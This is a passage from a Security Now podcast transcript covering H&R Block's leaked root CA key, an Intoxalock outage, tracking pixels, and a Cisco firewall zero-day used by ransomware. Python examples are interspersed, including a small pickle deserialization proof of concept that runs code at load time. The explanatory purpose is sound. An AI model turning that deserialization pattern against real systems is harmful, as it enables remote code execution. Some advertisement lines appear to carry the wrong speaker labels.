And since it's able to make a certificate, if it did expire, it could just make a new one. Yeah, it could even bump this along forward itself, you know, always installing a few months' worth of root CA that will gracefully, properly expire after a few months. You'd like to have the uninstaller remove it, because you don't want all this crap accumulating in your users' root stores. But okay. In addition, it should tightly constrain the use of the certificate so that it can only ever be used to sign a TLS end certificate. Those are constraints that could be added to the CA. They didn't do that, either. Okay, next: it generates a second 4096-bit public-private key pair.

Steve Gibson [00:51:39]:
It uses this second key pair to create the web server's local site certificate. That's the certificate the server will send to the user's local browser. And it would name it something like hrblock.localhost. That would be a safe name. .localhost is reserved for the local host as a sort of localhost pseudo-domain. So hrblock.localhost, which would mean that certificate could never be misused in any useful fashion. It would only ever be able to serve and encrypt and authenticate TLS connections. In order for this local site certificate to be trusted on that local machine, it needs to be signed by the root certificate's private key, that first one that was made, you know, the one belonging to the just-created local root CA. And then here's what's crucial and cool.

Steve Gibson [00:52:49]:
Immediately after that root CA's private key is used to sign the local site certificate, that private key is securely overwritten and deleted. The point is that private key is never written to non-volatile storage, so it is now permanently gone, and the locally installed root certificate can never be abused, because its matching private key, which is required for its abuse, no longer exists. It was ephemeral, it was transient, it's gone. Since its private key was only ever needed once, to sign the local certificate to prove that certificate's validity, it should never be retained. The installation, in my solution, would then add an entry to the system's hosts file which maps hrblock.localhost to 127.0.0.1. So now we have a certificate named hrblock.localhost, with a unique public and private key pair, that will only ever be trusted by a similarly unique root CA, which will itself expire a few months after it was created. Any local browser can now be directed to some unique port, I guess 80 if it's free, but you might want to do, you know, 8888, just for the sake of being out there somewhere. So, you know, hrblock.localhost:

Steve Gibson [00:54:35]:
8888. And now you're able to access the built-in web server in order to view the H&R Block UI in a client-server relationship. And lastly, on its way out, the software's uninstaller should remove the short-lived root CA certificate after it shuts down the local web server and deletes all of the product's files. So, as we've just seen in this example, if you really needed to do this for some reason, it can be done in a way that does not open any security holes. I don't even see why you'd have to, because you could just give somebody a set of static certs that would only be useful for hrblock.localhost. But even if you wanted every instance to be unique, and I can see a benefit there, it can still be done safely. That's not what H&R Block has done, though. Through very poor security design, sloppiness, and, as you said, apparently not caring, they've left behind a completely unconstrained CA root certificate with a 23-year lifetime, meaning it can sign TLS web certificates. It can sign code.
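To make the recipe concrete, here is a minimal sketch of what Steve describes, using Python's third-party cryptography library. The library choice, the names "Example Local Root" and "example.localhost", and the 90-day lifetime are illustrative assumptions, not anything H&R Block actually ships, and 2048-bit keys are used here for speed where Steve suggests 4096.

```python
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

now = datetime.datetime.utcnow()
lifetime = datetime.timedelta(days=90)  # short-lived, per-install

# 1. Ephemeral per-install root CA key pair: never shipped, never stored.
ca_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
ca_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Example Local Root")])
ca_cert = (
    x509.CertificateBuilder()
    .subject_name(ca_name).issuer_name(ca_name)
    .public_key(ca_key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now).not_valid_after(now + lifetime)
    # Constrain the CA: it may only sign end-entity certs, nothing below it.
    .add_extension(x509.BasicConstraints(ca=True, path_length=0), critical=True)
    .sign(ca_key, hashes.SHA256())
)

# 2. A second, separate key pair for the local web server's site certificate.
site_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
site_cert = (
    x509.CertificateBuilder()
    .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "example.localhost")]))
    .issuer_name(ca_name)
    .public_key(site_key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now).not_valid_after(now + lifetime)
    .add_extension(x509.SubjectAlternativeName([x509.DNSName("example.localhost")]), critical=False)
    .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
    .sign(ca_key, hashes.SHA256())  # the one and only use of the CA key
)

# 3. The CA private key is never written to disk; drop it immediately.
del ca_key

# The installed root cert can still verify the site cert it signed
# (raises an exception if the signature were invalid):
ca_cert.public_key().verify(
    site_cert.signature,
    site_cert.tbs_certificate_bytes,
    padding.PKCS1v15(),
    site_cert.signature_hash_algorithm,
)
```

After this runs, the installer would persist only the site key and certificate for the local web server, install the root cert into the OS trust store, and add a hosts-file line such as `127.0.0.1  hrblock.localhost`; because the CA's private key never touched disk, the trusted root can never be used to sign anything else.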

Steve Gibson [00:56:02]:
It can be used for any malicious purpose you can imagine, left behind in the root store of every one of their users, with its matching private key statically embedded in a shipping DLL so that it's known to the world. Um, this makes you wish that software liability in our industry were not as virtually nonexistent as it currently is. I mean, I'm sure somewhere in the license agreement that all users click on without reading, because you can't, you know, it's 25 pages of legalese, it says, by using this software, you agree to hold us harmless for any damage that may arise, even if we'd been informed beforehand that such damage could occur. The license agreements all say that. And so it's like, eh, we can do anything we want to your computer.

Mikah Sargent [00:56:58]:
That's so frustrating to me. Because I was going to say, I'm always curious. This person reached out to H&R Block, and H&R Block had to know that, coming from a genuine security researcher, this was going to be made public. I would imagine that if they just heard from some random person who did not put themselves forth as a security researcher at all, they might go, "Oh, we can bury this," or, "This won't matter." But to say basically, "We don't care," to someone who is going to disclose, that's the stuff where I want to meet every person involved in every part of these decisions and just hear what their thinking is. Because what is their thinking, and why would they feel this is not a big deal, when you're showing us how it can quickly become a big deal and the responsibility there is vast? But as you pointed out, with the right agreements in place, they don't need to care, do they? It's frustrating.

Leo Laporte [00:58:10]:
No.

Steve Gibson [00:58:13]:
Um, speaking of frustrating, the company known as Intoxalock— gotta love the name— provides court-mandated automotive breathalyzers that are installed into the automobiles of people whom a court has determined should be required to provide proof of their sobriety, through a quick built-in breathalyzer breath sample, every single time they get behind the wheel and wish to drive their car. Now, since breathalyzer technology is tricky and can be a bit flaky, it requires periodic calibration by an authorized calibration facility for reliable operation. And the calibration facilities, it turns out, are all tied back to the mothership in the cloud, which tracks and reports on all of this. Now, that whole system generally works pretty well, but it turns out only so long as a cyber attack does not render Intoxalock's entire periodic calibration and reporting infrastructure inoperative. This is exactly what befell Intoxalock the Saturday before last, on March 14th. So today is the 24th, a full 10 days later. Their calibration system remains offline. It's down.

Steve Gibson [00:59:58]:
Wow. The trouble now facing a gradually growing number of drivers who need to prove their sobriety to their cars is that the system's firmware has been designed to enforce a zero-tolerance policy. If you don't get a recalibration when it's needed, you don't get to drive, and right now you cannot recalibrate. As a result, as the recalibration system outage stretches on day after day, an increasing number of drivers are unable to use their automobiles. In some cases, Intoxalock is apparently— and this is on a state-by-state basis— able to offer a 10-day calibration extension, but that appears, as I said, to be limited by state. A posting on their service status page explains. It reads, effective immediately, service centers will be able to give your device a 10-day extension while our systems are being restored. Tennessee customers have a service date extension through Tuesday, March 24th.

Steve Gibson [01:01:24]:
That's today. At this time, this extension is not available in Michigan or Washington.

Mikah Sargent [01:01:32]:
Wow.

Steve Gibson [01:01:34]:
We're actively working toward a resolution and will notify you as soon as anything changes. So here we have an interesting case of people's physical lives being meaningfully impacted by a cyber event. Since the calibration and reporting system sounds like it's very database-driven, I would not be surprised to learn that Intoxalock, although this hasn't been publicly disclosed, had fallen victim to a generic ransomware attack which encrypted all of their systems. And in this case, consider the data that may also have been exfiltrated—

Mikah Sargent [01:02:26]:
yeah, a list of all the people. Oh my goodness.

Steve Gibson [01:02:31]:
Yes, all of the people. Extra personal, extra private, and extra sensitive. You know, involving the identities and the habits— the drinking habits and the drinking-and-driving habits— of U.S. drivers who have been under court-mandated driving restrictions. That's not the sort of data anyone would wish to have floating around the internet. I would argue it makes a Social Security number look tame by comparison.

Mikah Sargent [01:03:04]:
Yeah, this is a huge blackmail target. Honestly, I was going to make some silly joke about wondering how many executives didn't get to work on time that day, and then you said what you said, and it gave me goosebumps. This is horrible. This is awful. This is terrible.

Steve Gibson [01:03:23]:
Yeah, it's not good. And they apparently are the go-to company for this service. I was looking to see, uh, where—

Mikah Sargent [01:03:35]:
While you're looking for what their status page says today, it also made me wonder if the calibration narrative is pushed by that company so that they can continue to make money even after those breathalyzers are installed. And of course that's just supposition, but it is a very interesting thing, to be one of the main companies providing what ends up being a government-mandated device, uh, needing to have these regular check-ins.

Steve Gibson [01:04:15]:
Yeah, and the good news is they have got their systems back up. I went to intoxalock.com/status and I'm getting a green bar: systems restored, services and installations resuming. And it's got lots of instructions for people who were inconvenienced, and there's a mobile app, and so forth. Note: if you received a service date extension in Tennessee during the temporary pause, please return to the service center today, on March 24th. Failure to do so may result in an extension or full restart of the interlock program, whatever that means. So anyway, the good news is it looks like they paid the ransom or restored from backups. We don't really know. But they are back up.

Steve Gibson [01:05:07]:
But if nothing else, this demonstrates that our cyber world is increasingly interacting with the physical world and can cause people a lot of inconvenience, especially when you've got all of your eggs in one basket. And even with the system restored, if this was a cyber attack and they exfiltrated all of their database data, as you said, there are now serious extortion opportunities for anybody important who cares about keeping their past problems with drinking and driving private.

Mikah Sargent [01:05:51]:
Yeah, that's mortifying.

Steve Gibson [01:05:55]:
Okay, so exactly one week ago, last Tuesday the 17th, Mozilla posted some welcome news under the heading More Reasons to Love Firefox. I don't need any more reasons; I love Firefox. But okay. They wrote about what's new now and what's coming soon. They start their post off rather generically by writing, Firefox is for people who make their own choices online. Apparently they're saying, you know, Chrome people are sheep. I don't know. From what stays private, they wrote, to the tools that help get things done.

Steve Gibson [01:06:33]:
That commitment to choice shows up throughout the Firefox experience. The AI controls are just the latest example— meaning you can turn them off— making it possible to turn generative AI features off, on, or customize them feature by feature. Over the coming weeks, we'll be rolling out a series of updates that build on that. Expect more control where it matters, better protections in the background, and a few new tools that make everyday browsing better. You may even spot a fresh face of Firefox along the way. Okay, then they talk about the ability to turn off any generative AI, and a new feature coming in the next Firefox 149 which will allow side-by-side page display and the ability to write and attach notes to tabs. Um, okay. I'm not sure about the whole AI thing.

Steve Gibson [01:07:31]:
The side-by-side web page thing sounds as though it might come in handy for me for podcast production, since I'm often flipping back and forth between Google Docs, where I author the page, and the source information. So that would be cool. But the forthcoming new feature that caught my eye, and which I felt sure would interest our listeners, was in Firefox 149, which drops today, March 24th: its new free built-in VPN. They wrote, a free built-in VPN is coming to Firefox. Free VPNs can sometimes mean sketchy arrangements that end up compromising your privacy. And I've often said, you know, don't trust a free VPN from some sketchy provider. Certainly Mozilla is not that. They said, but ours is built from our data principles and commitment to be the world's most trusted browser.

Steve Gibson [01:08:39]:
It routes your browser traffic through a proxy to hide your IP address and location while you browse, giving you stronger protection online with no extra downloads. Users will have 50 gigabytes of data monthly in the US, France, Germany, and the UK to start. Available in Firefox 149 starting March 24th. In other words, as I said, today. Now, we know that there's been something of a gold rush to VPN services, driven by the increasing use of IP-based geolocation to limit underage access to age-restricted internet content and services. Unfortunately, Firefox's desktop presence continues to slip in terms of market share, down from 6.3% last year to just 4.2% this year. So Mozilla may be hoping that the presence of a built-in free VPN service will help.

Steve Gibson [01:09:54]:
It is worth noting also that it has not escaped the awareness of legislators, unfortunately, that people are rushing to use VPNs in order to get around state-based location age restrictions. And there has actually been some conversation about legislation to prohibit VPN use. Which, you know, good luck with that. I mean, it's like, hey, you know, those TCP connections, they're pesky. I think we'd better outlaw TCP.

Mikah Sargent [01:10:33]:
Oh, Lord, could you imagine?

Steve Gibson [01:10:35]:
Oh, come on, guys. Where does it stop? One place I know it doesn't stop is with our advertisers. And what a great place for us to take a break for a sponsor.

Mikah Sargent [01:10:52]:
I love that. What a great segue. Leo, take it away.

Leo Laporte [01:10:56]:
Hey guys, this episode of Security Now brought to you by OutSystems, the number one AI development platform. OutSystems helps businesses bridge the enterprise gap to their agentic future, where the constraints of the past give way to unlimited capacity and scale. OutSystems enables businesses of all sizes to build agents that actually do work: things like take actions, make decisions, and integrate with data, more than just answering questions. OutSystems provides the only AI development platform that's unified, agile, and enterprise-proven. Let me explain. Unified, because you build, run, and govern apps and agents all in one platform, OutSystems. Agile, because you can now innovate at the speed of AI and, importantly, without compromising quality or control. It's enterprise-proven because it's trusted by enterprises for some of the most important mission-critical AI applications and durable innovation.

Leo Laporte [01:11:58]:
OutSystems, it's the secret weapon behind the world's most successful companies. And this isn't just for small apps. These are, in many cases, massive, complex systems that are running banks, insurance companies, government services. OutSystems even helps companies with aging IT environments bridge the gap to the AI future without a rip-and-replace nightmare. It almost feels like you could do anything. OutSystems provides the safest and fastest way for an enterprise to go from, we need an AI strategy, to, yeah, we have a functioning AI application. Stop wondering how AI will change your business and start building the agents that will lead it. Visit OutSystems.com/TWIT to see how the world's most innovative enterprises use OutSystems to build, deploy, and manage AI apps and agents quickly and cost-effectively without compromising reliability and security.

Leo Laporte [01:12:53]:
That's OutSystems.com/TWIT to book a demo. OutSystems.com/TWIT. We thank them so much for supporting the good work Steve does here at Security Now. Now back to the show.

Mikah Sargent [01:13:10]:
Indeed, we are back to the show. Take it away, Steve.

Steve Gibson [01:13:14]:
Okay, so, uh, I just learned how far "tracking pixels"— and we now need to put that in air quotes because they are so much more— have come. They're easy to miss because, much like cookies, the code which their presence on any web page allows to run is completely hidden from us. I mean, it's not that you can't get it, but it's not easy to see. Last Wednesday the 18th, the security researchers at JScrambler shared what they had recently learned about what TikTok and Meta are both now doing. Their headline was Beyond Analytics: The Silent Collection of Commercial Intelligence by TikTok and Meta Ad Pixels. And as we're going to see, JScrambler's writing is targeted at web merchants who are voluntarily putting these insidious tracking pixels onto their sites. Because this is not something that happens without the site provider's knowledge. This is something where they said, oh yeah, we want the analytics, or we want whatever we're getting in return. So every page that they serve will have a reference to some JavaScript back at Meta or at TikTok or wherever, basically causing the user's web browser to pull in that resource and invoke whatever the script is.

Steve Gibson [01:15:04]:
So here's what they explain. They wrote, TikTok and Meta's tracking pixels are quietly harvesting personal data, granular checkout interactions, and detailed commerce intelligence from the users of the websites that implement them. The collection is going far beyond what ad attribution requires, creating serious privacy compliance risks and competitive disadvantages for the businesses involved. JScrambler conducted a runtime analysis of the ad pixels used by TikTok and Meta on actual websites, revealing that their default behavior requires immediate attention from every organization that employs them. The analysis focused on large companies in the retail, hospitality, and healthcare sectors. However, it's worth noting that most businesses with an online presence use these tracking pixels on their websites as well. Okay, now, I'm sure I don't need to tell our listeners that this is not something I, you know, with GRC, would ever consider doing. I'm annoyed that I've given Google any presence at all, but that little search box, that's a pro-visitor feature. Other than that, GRC may be ancient-appearing, but it's also completely devoid of all modern web analytics, because I would rather protect my users' privacy.

Steve Gibson [01:16:49]:
What's so insidious about this is that when a company says, okay, yes, we'll make a query to your ad server to pull in your ad pixel, they have no control over what it does once it gets there. That's the key point. It's very much like software that goes out and downloads some other software to enhance itself: if the behavior of that downloaded software changes, then the overall product changes after the fact. Yeah. Anyway, JScrambler continues, writing, tracking pixels were once just a small snippet of code on a web page to confirm an ad impression or log a visit. Almost all websites use them to track user behavior, measure ad performance, and optimize marketing efforts. These pixels let businesses see which ads drive traffic, conversions, or sales, and provide data to retarget users who showed interest but might not have completed a purchase.

Steve Gibson [01:18:09]:
What many website owners likely don't realize is that TikTok and Meta's pixels now go far beyond those traditional tracking tags. They collect user emails, phone numbers, and addresses, turning seemingly anonymous browsing data into persistent, identifiable user profiles. TikTok's pixel, they write, creates 3 different data records for each user interaction: a primary event record of what the user did, such as viewing a product or adding to a cart; a metadata record; and a performance record, all connected using the same session ID. When personal information like an email or phone number appears on a page, TikTok's identity module processes it, normalizes it, and converts it into a SHA-256-style hashed identifier before sending it out. Meta takes a similar approach, hashing a wide range of fields including first and last names, locations, and external identifiers. The hashes are deterministic, meaning they produce the same output for the same input each time. And because the hash is built from predictable data like emails and phone numbers, it's easy to re-identify them by matching those hashes against existing hashed data. Meaning that if Meta has your email address and hashes it, they get the same hash.

Steve Gibson [01:20:01]:
If they have your phone number and hash it, they get the same hash. So when those hashes later pop up out on the web, they know it's you. There's no mystery there. You are not anonymized. And they write, it effectively eliminates anonymization, allowing platforms to recover original user data and build long-term behavioral profiles without the user's knowledge. In practice, this is like a candidate-input matching process, where emails or phone numbers are compiled or generated, hashed, and then compared against the target hashes to find matches. Identity resolution is only part of the problem. JScrambler's research, they wrote, found that TikTok and Meta's ad pixels methodically harvest detailed product-level intelligence and entire customer journeys from merchant websites.
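The deterministic-hash matching Steve describes is easy to demonstrate. Here is a minimal sketch; the normalization rule and email addresses are hypothetical, but the mechanics match what JScrambler describes:

```python
import hashlib

def hashed_id(value: str) -> str:
    # Typical pixel-style normalization before hashing: trim and lowercase,
    # then SHA-256. Deterministic: same input always yields the same output.
    return hashlib.sha256(value.strip().lower().encode("utf-8")).hexdigest()

# The "anonymized" identifier that leaves the browser:
observed = hashed_id("  Alice.Smith@Example.com ")

# Anyone already holding a list of emails can re-identify it by hashing
# their candidates and comparing, precisely because the hash is deterministic:
candidates = ["bob@example.com", "alice.smith@example.com"]
matches = [e for e in candidates if hashed_id(e) == observed]
# matches == ["alice.smith@example.com"]
```

Because anyone can run the same normalize-and-hash step, a hashed email behaves as a stable cross-site identifier, not an anonymized one.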

Steve Gibson [01:21:05]:
Meta and TikTok's requests routinely include product names, unit prices, quantities, currency, and total cart values. They also log specific checkout actions, such as add to cart or add payment info. In other words, stuff that is none of their business. Meta's telemetry even records the structure of checkout forms and buttons, providing insight into how a merchant's site is built. Wow.

Mikah Sargent [01:21:43]:
Are they making this data available to the people whose sites they're on?

Steve Gibson [01:21:49]:
That's wild.

Mikah Sargent [01:21:50]:
This is not a trade.

Steve Gibson [01:21:52]:
It's totally intrusive, for Meta's benefit, and maybe they're selling it. Yeah, I mean, it's data that they are aggregating. So I'll just interrupt to note that if you might be thinking that none of this is any of Meta's effing business, I would agree with you wholeheartedly. It is so wrong and intrusive. They do it simply because they can. They can because it's hidden, because web browsers will by default run any JavaScript they're given, and because there's no one looking, no one to stop them. JScrambler continues— well, and I'll note also, Meta can say, oh, but we hash the data. We anonymize it.

Steve Gibson [01:22:44]:
No, you don't. You're not throwing a random token in with the hash, because if you did, it wouldn't be useful to you. It would then be purely random noise. So, they said, merchants are unlikely to be aware of the extent to which their websites share data with these tracking pixels. While they might know that pixels collect basic conversion information, much of the detailed product-level, checkout-stage, and structural form data is automatically captured or passed through integrations like Shopify with little visibility. While businesses might think they're enabling only standard tracking, in reality they are feeding third-party platforms a deep, continuous view of their product catalog, pricing, and customer behavior that could potentially benefit larger rivals. The implications from a privacy, compliance, and sensitive data exposure standpoint should be very concerning for any organization using these pixels. JScrambler found TikTok pixels capturing sensitive data even before a user had the opportunity to make a consent choice.
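Steve's aside about a random token is exactly salting. Here's an illustrative sketch of what the pixels deliberately don't do; the code is a hypothetical example, not any platform's actual implementation:

```python
import hashlib
import secrets

def salted_id(value: str) -> str:
    # With a fresh random salt each time, the same email never hashes the
    # same way twice, so cross-site matching becomes impossible.
    salt = secrets.token_hex(16)
    return hashlib.sha256((salt + value.strip().lower()).encode("utf-8")).hexdigest()

a = salted_id("alice@example.com")
b = salted_id("alice@example.com")
# a != b: genuinely anonymized, and therefore useless for tracking,
# which is exactly why the ad platforms don't hash this way.
```

An unsalted hash is a stable identifier; a randomly salted one is noise. The platforms need the identifier, so they skip the salt.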

Steve Gibson [01:24:12]:
And in some cases even after a user had clicked reject all. We observed TikTok capturing physical addresses entered into store locator fields at major French and German retailers, and transmitting the data back to their servers. Meta's pixel includes a feature called automatic events, which is enabled by default. The feature automatically scans page elements and captures information such as checkout interactions and visible payment card details, including the last digits, expiration date, and cardholder name.

Mikah Sargent [01:25:00]:
Why? I mean, I know why, but I just—

Steve Gibson [01:25:04]:
It's full spying.

Mikah Sargent [01:25:07]:
Yeah, it's absolutely full spying. And to do it without any regard of just like— they're not even having to explain themselves because, as you've pointed out, no one's paying attention to this.

Steve Gibson [01:25:18]:
Yep. Since this— they write, since this is the default behavior and not opt-in, merchants may not be aware that the pixel is collecting this information. The pixel. I love that name. Calling it a pixel makes it seem, oh, look, it's just a tiny little thing.

Mikah Sargent [01:25:35]:
Exactly.

Steve Gibson [01:25:38]:
On separate sites, Meta captured recipients' full names and delivery addresses when users selected address options during checkout. TikTok's pixel was observed exhibiting similar behavior, harvesting sensitive user data during the checkout process. This included partial payment card details and other personal data provided by the customer. Both TikTok and Meta's pixel code can load and begin transmitting data. Hear it again: both TikTok and Meta's pixel code can load and begin transmitting data before the website's consent management system has time to block it, meaning information can leave the browser before the user's choice is applied. That's right, right? We asked the user, they said no, but oops, it was too late. Yeah, even more concerning is that data may be transmitted in clear text, occasionally within the request URL itself, exposing sensitive information to browser histories, server logs, intermediaries, and debugging tools.

Steve Gibson [01:27:03]:
This vulnerability— so it wasn't even well done with, like, a privacy-first approach. They said this vulnerability stems not only from the Pixel's data collection methods but also from misconfigurations during its implementation or from issues with the website's underlying architecture. Consequently, the attack surface is significantly broader than a surface-level analysis would suggest. The behaviors JScrambler documented put websites in direct conflict with GDPR, CCPA, and other major privacy regulations. The potential violation triggers include consent failures, inadvertent personal data transmission, and financial or address data exposed in logs that outlast the original request. In addition, the exposure of partial cardholder data and address information increases the risk for identity theft and secondary data breaches. From a competitive standpoint, merchants need to understand that the pixels they implement— pixels, I mean, calling it a pixel is so wrong.

Mikah Sargent [01:28:18]:
Yep, I agree.

Steve Gibson [01:28:19]:
The pixels they implement are not passive measurement tools. They are instead active data collection systems that feed proprietary commercial intelligence, such as pricing, product mix, conversions, and customer behavior, directly into the same global advertising platforms that every other merchant on those platforms, including rivals, relies on. Larger rivals with bigger ad budgets could benefit, because the more data the platform collects from all merchants, the better its targeting becomes. Often better targeting favors those with the most budget to spend on ads because there are more ads available for choosing. To manage these risks, they write, organizations need to do considerably more than just review a pixel's documentation. This involves auditing actual pixel configurations, meaning work, and implementing continuous monitoring to catch scope creep, meaning the pixel used to be a cute little thing that only targeted ads, but that was 10 years ago. Now you're downloading a whole suite of spying intelligenceware in that cute little pixel's JavaScript. They finish: where a third-party script begins collecting more data than originally intended.

Steve Gibson [01:29:59]:
Exactly so. Wow. Geez Louise. That's, yeah, so that's again frustrating. It's, it's, it's commerce, you know, getting away with everything it can. And of course, why wouldn't they? You know, we're talking Meta. They're an aggressive commercial organization and they've, you know, convinced the whole world to put their cute little tracking pixels everywhere. Yikes.

Steve Gibson [01:30:26]:
Okay, uh, as we know, no one is an island. Uh, unfortunately, that's a problem if you don't get any messages. I suppose we should not be surprised that Russia's increasingly stringent and pervasive internet stranglehold is choking their own local companies. Russia's private sector is desperately asking their government to lift the recently imposed total bans on Telegram, WhatsApp, and other foreign messaging platforms. Uh, it seems that not everything needed to conduct business in Russia can be found within Mother Russia, and that Russian entities need to conduct business and work with foreign partners. And unfortunately, Russia is saying, no, we don't want you to be using— you know, they've got their own. I can't remember now what it's called. They did a native Russian messaging app, which of course no one wants to use.

Steve Gibson [01:31:42]:
Because we know that Russia is spying on it. So nobody outside Russia wants to have anything to do with some Russian spyware. Who knows what it does once it gets into their machines? Uh, another bit of news. I saw this blurb in a security news summary and I thought, okay, well, uh, that's interesting. Let me share it first, then I'll tell everyone what I thought. The security news blurb was titled OpenClaw phishing campaign. And it just said threat actors are spamming GitHub issues and tagging other developers with fake promises of OpenClaw tokens. The plan is to lure the devs to phishing sites where they're asked to connect their crypto wallets but are getting their accounts emptied.

Steve Gibson [01:32:41]:
Okay, so that's all we know. I don't ever want to see anyone hurt, of course. Really, I don't ever. But anyone who would naively connect their crypto wallet containing any amount of crypto which they're not entirely prepared to be separated from in the next moment, especially if they consider themselves to be savvy enough to be a developer, uh, they would have a difficult time extracting much sympathy from me, even though I would never want them to be hurt.

Mikah Sargent [01:33:22]:
I mean, really, you know, you sometimes need an object lesson, and someone who's making those mistakes perhaps needs one.

Steve Gibson [01:33:29]:
And I just hope it's not too expensive a lesson. I would certainly be sorry if anyone were scammed, but I would not be very surprised. So our takeaway here is please, please always be careful, you know, especially anytime you're connecting any wallet to any sort of automated system which you cannot be 100% certain of. You know, really, like, set up a secondary wallet, transfer a little bit of working money there, and then, you know, use that if you must connect it to something, but, you know, not your wallet where you actually store any useful amount of money. Since we previously touched upon Cisco's very bad 10.0 CVE-2026-20127, which was that widely exploited authentication zero-day discovered while being exploited in Cisco's Catalyst SD-WAN enterprise product line, really, anyone could be forgiven for confusing that one with Cisco's CVE-2026-20131. So not 27, no, 31, which is another— wait for it— CVSS 10.0 critical vulnerability in Cisco's systems. As I said at the top of the show, what would the Security Now podcast be without a brand new shiny Cisco CVSS critical 10.0?

Steve Gibson [01:35:22]:
The NIST NVD, the National Vulnerability Database, says of the new one, 31, they write, a vulnerability in the web-based management interface, who would have guessed, of Cisco Secure Firewall Management Center software, apparently not that secure, could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device. In other words, there you go, Cisco 10.0. They wrote, this vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. That's right. Unfortunately, most of the world that's not listening to this podcast has not caught up to the many continuing demonstrations that authentication does not work.
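The NVD text above describes insecure deserialization of a user-supplied Java byte stream. Java isn't handy here, but Python's pickle exhibits the same failure mode and makes the mechanics visible in a safe, self-contained sketch: the attacker-controlled byte stream itself tells the deserializer what callable to invoke, so merely loading it runs code. The function name here is purely illustrative.

```python
import pickle

executed = []

def run_attacker_code(message: str) -> str:
    # Stand-in for the attacker's payload; a real exploit would invoke
    # something like os.system instead of appending to a list.
    executed.append(message)
    return message

class Exploit:
    def __reduce__(self):
        # __reduce__ tells pickle how to "reconstruct" the object:
        # call this function with these arguments at load time.
        return (run_attacker_code, ("code ran during deserialization",))

payload = pickle.dumps(Exploit())  # the crafted serialized object
pickle.loads(payload)              # merely loading it executes the call

print(executed)  # prints ['code ran during deserialization']
```

This is why "never unpickle untrusted data" appears in Python's own documentation, and why a crafted serialized Java object reaching a management interface can translate directly into code execution as whatever user the service runs as.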

Steve Gibson [01:36:51]:
If authentication did work, then unauthenticated hackers and attackers would not and could not be continuously breaking into supposedly protected systems in ways that bypass their authentication controls, right? I mean, 1 plus 1 equals 2. Not to mention, oh, I don't know, allowing them to execute their arbitrary Java code as root on breached devices. And so what happens to enterprises who solely rely upon Cisco's broken authentication promises to protect their perimeters? Last Wednesday the 18th, Amazon Threat Intelligence posted their observation under the headline Amazon Threat Intelligence Teams Identify Interlock Ransomware Campaign Targeting Enterprise Firewalls. Gee, which enterprise firewall do you think that could be? Amazon's threat hunters wrote, quote, Amazon Threat Intelligence has identified an active Interlock ransomware campaign exploiting CVE-2026-20131, a critical vulnerability in Cisco Secure Firewall Management Center software that could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device, which was disclosed by Cisco on March 4th, 2026. Now, that's an important date. March 4th, 2026. Disclosure means patch available on March 4th, 2026. They wrote, they, Amazon.

Steve Gibson [01:38:48]:
After Cisco's disclosure, Amazon Threat Intelligence began research into this vulnerability using Amazon's MadPot global sensor network, a system of honeypot servers that attract and monitor criminal cyber activity. While looking for any current or past exploits of this vulnerability, our research found that Interlock was exploiting this vulnerability 36 days before its public disclosure, beginning January 26, 2026. This wasn't, they write, this wasn't just another vulnerability exploit. Interlock had a zero-day in their hands, giving them a 5-week head start to compromise organizations before defenders even knew to look. Upon making this discovery, we shared our findings with Cisco to help support their investigation and protect customers. Okay, so just so that everyone is clear about the timing of this again, Amazon discovered exploitation of this zero-day dating back as far as January 26th, and Cisco's announcement and patch wasn't made available until March 4th. So for at least 36 days, or a little more than 5 weeks, only the bad guys knew of this, and even fully patched and up-to-date Cisco Secure firewalls and the enterprises behind them were being compromised and falling victim to this Interlock ransomware campaign through no fault of theirs.

Steve Gibson [01:40:46]:
Those— they were fully patched and updated. Amazon explained what they found, writing that a misconfigured infrastructure server, essentially a poorly secured staging area used by the attackers, exposed Interlock's complete operational toolkit. This rare mistake provided Amazon's security teams with visibility into the ransomware group's multi-staged attack chain: custom remote access Trojans, backdoor programs that give attackers control of compromised systems, reconnaissance scripts, meaning automated tools for mapping victim networks, and evasion techniques. In other words, Amazon has honeypots. The bad guys infected a honeypot. Amazon was able to use the infection to track backwards up into the attackers' infrastructure, which they found improperly set up, so they were able to get in. Now, hold on.

Steve Gibson [01:41:59]:
What if—

Mikah Sargent [01:42:01]:
maybe I'm writing a movie now, but what if that was just a reverse honeypot and it points Amazon down the wrong route when they found all this data?

Steve Gibson [01:42:11]:
That could be possible, although what they worked from was Cisco's fresh disclosure. So they had evidence that that system was attacking their honeypot back as many as 36 days earlier using information that was not public. So nobody knew how it could be used to get into their customers' machines. We're at an hour and a half in. Let's take a break, and then I'm going to finish up with what Amazon tells us about this interesting and unfortunately all-too-common Cisco vulnerability.

Mikah Sargent [01:42:56]:
I will say the magic words to summon Leo Laporte. Bippity boppity Laporte.

Leo Laporte [01:43:04]:
This episode of Security Now brought to you by Zscaler, the world's largest cloud security platform. You know, we talk about this all the time. The potential rewards of AI are far too great for any company to ignore, but so are the risks, right? Loss of sensitive data, attacks against enterprise-managed AI. Generative AI increases opportunities for threat actors, helping them to rapidly create phishing lures, write malicious code, and automate data extraction. Did you know there were 1.3 million instances of Social Security numbers leaked to AI applications last year? ChatGPT and Microsoft Copilot saw nearly 3.2 million data violations. Yikes. It's time to rethink your organization's safe use of public and private AI. And if you want to know more, just check out what Siva, the Director of Security and Infrastructure at Zuora, says about using Zscaler to prevent AI attacks.

Leo Laporte [01:44:03]:
Watch.

Mikah Sargent [01:44:04]:
With Zscaler being in line in a security protection strategy, it helps us monitor all the traffic.

Steve Gibson [01:44:10]:
So even if a bad actor were to use AI, because we have a tight security framework around our endpoints, it helps us proactively prevent that activity from happening.

Mikah Sargent [01:44:20]:
AI is tremendous in terms of its opportunities, but it also brings in challenges.

Steve Gibson [01:44:24]:
We're confident that Zscaler is gonna help us ensure that we're not slowed down by security challenges, but continue to take advantage of all the advancements.

Leo Laporte [01:44:34]:
